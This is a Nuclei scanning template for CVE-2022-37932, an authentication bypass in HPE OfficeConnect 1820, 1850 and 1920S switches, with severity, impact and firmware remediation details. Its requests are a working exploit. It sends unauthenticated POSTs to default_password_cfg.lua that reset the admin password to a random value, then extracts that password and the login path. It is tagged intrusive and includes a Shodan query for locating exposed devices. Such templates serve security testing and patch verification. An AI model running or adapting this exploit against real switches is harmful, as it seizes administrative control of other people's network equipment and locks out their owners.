id: CVE-2022-37932

info:
  name: HP Switch - Authentication Bypass
  author: Phulelouch
  severity: high
  description: |
    A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made the following software updates to resolve the vulnerability in Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S Network switches versions- Prior to PT.02.14; Prior to PC.01.22; Prior to PO.01.21; Prior to PD.02.22;
  impact: |
    Attackers on the adjacent network can bypass authentication on HP OfficeConnect switches without credentials, potentially gaining administrative access to modify switch configurations, intercept network traffic, or disrupt network operations.
  remediation: |
    Update to HPE OfficeConnect switch firmware version PT.02.14 or later for 1820 series, PC.01.22 or later for 1850 series, or PO.01.21/PD.02.22 or later for 1920S series.
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-37932
    epss-score: 0.36699
    epss-percentile: 0.9725
    cpe: cpe:2.3:o:hpe:officeconnect_1820_j9979a_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: hpe
    product: officeconnect_1820_j9979a_firmware
    shodan-query: html:"HPE OfficeConnect"
  tags: cve,cve2022,hp,officeconnect,auth-bypass,intrusive,vkev,vuln

variables:
  password: "{{rand_base(8)}}"

flow: http(1) && (http(2) || http(3))

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, '<title>HPE OfficeConnect Switch 1920')"
        condition: and
        internal: true

  - raw:
      - |
        POST /login/default_password_cfg.lua HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "redirect")'
          - 'contains(content_type, "application/json")'
        condition: and

    extractors:
      - type: json
        name: redirect
        part: body
        json:
          - .redirect
        internal: true

      - type: dsl
        dsl:
          - '"Password:"+ password'
          - '"Login Path:"+ redirect'
  - raw:
      - |
        POST /htdocs/login/default_password_cfg.lua HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "redirect")'
          - 'contains(content_type, "application/json")'
        condition: and

    extractors:
      - type: json
        name: redirect
        part: body
        json:
          - .redirect
        internal: true

      - type: dsl
        dsl:
          - '"Password:"+ password'
          - '"Login Path:"+ redirect'
# digest: 4b0a00483046022100c5a47e2118e21d62c18b4f8d3b2872275b9f33db1d5b00237197633a53da307d022100b5d5baa5e8a837c1663b12d728d1c3d3e3bc567b7c1c88ccc07f81f6dfffd741:922c64590222798bb761d5b6d8e72950